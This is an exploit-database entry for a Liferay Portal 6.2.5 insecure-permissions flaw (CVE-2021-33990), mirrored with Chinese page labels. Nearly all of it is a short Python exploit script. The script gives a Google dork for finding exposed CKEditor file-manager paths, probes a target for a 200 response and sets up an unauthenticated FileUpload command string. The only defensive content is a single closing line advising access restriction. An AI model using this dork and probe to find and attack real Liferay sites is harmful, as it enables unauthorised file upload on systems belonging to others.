Liferay Portal 6.2.5 – Insecure Permissions

• Exploit Database
• 124 阅读

• 作者： Fu2x2000
  日期： 2023-04-05
• 类别：

  • webapps
  平台：

  • java
• 来源：https://www.exploit-db.com/exploits/51244/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions # Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/ # Date: 2021/05 # Exploit Author: fu2x2000 # Version: Liferay Portal 6.2.5 or later # CVE : CVE-2021-33990   import requests import json   print (" Search this on Google #Dork for liferay -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/")   url ="URL Goes Here /html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html" req = requests.get(url) print req sta = req.status_code if sta == 200: print ('Life Vulnerability exists') cook = url print cook inject = "Command=FileUpload&Type=File&CurrentFolder=/" #cook_inject = cook+inject #print cook_inject else: print ('not found try a another method')     print ("solution restrict access and user groups")